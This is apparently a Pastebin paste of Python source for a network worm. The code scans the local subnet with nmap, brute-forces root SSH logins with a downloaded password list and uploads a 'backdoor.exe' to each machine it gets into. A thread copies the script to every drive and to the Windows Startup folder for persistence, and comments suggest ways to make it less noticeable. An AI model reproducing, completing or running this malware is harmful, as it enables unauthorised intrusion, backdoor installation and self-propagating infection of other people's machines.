Advertisement
FlyFar

worm

Feb 28th, 2023
1,131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.81 KB | Cybersecurity | 0 0
  1. import nmap
  2. import paramiko
  3. import os
  4. import socket
  5. from urllib.request import urlopen
  6. import urllib
  7. import time
  8. from ftplib import FTP
  9. import ftplib
  10. from shutil import copy2
  11. import win32api
  12. import netifaces
  13. from threading import Thread
  14.  
  15. # ----- -----
  16. import networking
  17. # ----- -----
  18.  
  19. # ------------------- Logging ----------------------- #
  20. import coloredlogs, logging
  21. logger = logging.getLogger(__name__)
  22. coloredlogs.install(fmt='%(message)s',level='DEBUG', logger=logger)
  23. # --------------------------------------------------- #
  24.  
  25.  
  26. # gets gateway of the network
  27. gws = netifaces.gateways()
  28. gateway = gws['default'][netifaces.AF_INET][0]
  29.  
  30. def scan_hosts(port):
  31.     """
  32.    Scans all machines on the same network that
  33.     have the specified port enabled
  34.    Returns:
  35.        IP addresses of hosts
  36.    """
  37.     logger.debug(f"Scanning machines on the same network with port {port} open.")
  38.  
  39.  
  40.     logger.debug("Gateway: " + gateway)
  41.  
  42.     port_scanner = nmap.PortScanner()
  43.     port_scanner.scan(gateway + "/24", arguments='-p'+str(port)+' --open')
  44.  
  45.     all_hosts = port_scanner.all_hosts()
  46.  
  47.     logger.debug("Hosts: " + str(all_hosts))
  48.     return all_hosts
  49.  
  50.  
  51. def download_ssh_passwords(filename):
  52.     """
  53.     Downloads most commonly used ssh passwords from a specific url
  54.      Clearly, you can store passwords in a dictionary, but i found this more comfortable
  55.    Args:
  56.        filename - Name to save the file as.
  57.    """
  58.  
  59.     # TODO:130 This wordlist contains only few passwords. You would need a bigger one for real bruteforcing. \_(OwO)_/
  60.  
  61.     logger.debug("Downloading passwords...")
  62.     url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt"
  63.     urllib.request.urlretrieve(url, filename)
  64.     logger.debug("Passwords downloaded!")
  65.  
  66.  
  67. def connect_to_ftp(host, username, password):
  68.     # TODO:30 : Finish this function + Add bruteforcing
  69.     try:
  70.         ftp = FTP(host)
  71.         ftp.login(username, password)
  72.     except ftplib.all_errors as error:
  73.         logger.error(error)
  74.         pass
  75.  
  76.  
  77. def connect_to_ssh(host, password):
  78.     """
  79.    Tries to connect to a SSH server
  80.    Returns:
  81.        True - Connection successful
  82.        False - Something went wrong
  83.    Args:
  84.        host - Target machine's IP
  85.        password - Password to use
  86.    """
  87.  
  88.     # TODO:120 Pass usernames to the function too
  89.  
  90.     client = paramiko.SSHClient()
  91.     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  92.     try:
  93.         logger.debug("Connecting to: " + host)
  94.         client.connect(host, 22, "root", password)
  95.         logger.debug("Successfully connected!")
  96.  
  97.         sftp = client.open_sftp()
  98.         sftp.put('backdoor.exe', "destination") # change this.
  99.  
  100.         return True
  101.     except socket.error:
  102.         logger.error("Computer is offline or port 22 is closed")
  103.         return False
  104.     except paramiko.ssh_exception.AuthenticationException:
  105.         logger.error("Wrong Password or Username")
  106.         return False
  107.     except paramiko.ssh_exception.SSHException:
  108.         # socket is open, but not SSH service responded
  109.         logger.error("No response from SSH server")
  110.         return False
  111.  
  112.  
  113. def bruteforce_ssh(host, wordlist):
  114.     """
  115.    Calls connect_to_ssh function and
  116.    tries to bruteforce the target server.
  117.    Args:
  118.        wordlist - TXT file with passwords
  119.    """
  120.     # TODO:10 : Bruteforce usernames too
  121.     file = open(wordlist, "r")
  122.     for line in file:
  123.         connection = connect_to_ssh(host, line)
  124.         print(connection)
  125.         time.sleep(5)
  126.  
  127. def drivespreading():
  128.     # This function makes the worm copy itself on other drives on the computer
  129.     # (also on the "startup" folder to be executed every time the computer boots)
  130.    
  131.     # WARNING: This function is very obvious to the user. The worm will be suddenly on every drive.
  132.     # You may want to change the code and e.g. copy the worm only on new drives
  133.     bootfolder = os.path.expanduser('~') + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
  134.  
  135.     while True:
  136.         drives = win32api.GetLogicalDriveStrings()
  137.         drives = drives.split('\000')[:-1]
  138.         print(drives)
  139.         for drive in drives:
  140.             try:
  141.                 if "C:\\" == drive:
  142.                     copy2(__file__, bootfolder)
  143.                 else:
  144.                     copy2(__file__, drive)
  145.             except:
  146.                 pass
  147.        
  148.         time.sleep(3)
  149.  
  150. def start_drive_spreading():
  151.     # Starts "drivespreading" function as a threaded function.
  152.     # This means that the code will spread on drives and execute other functions at the same time.
  153.     thread = Thread(target = drivespreading)
  154.     thread.start()
  155.    
  156. def main():
  157.     start_drive_spreading()
  158.  
  159.  
  160. if __name__ == "__main__":
  161.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement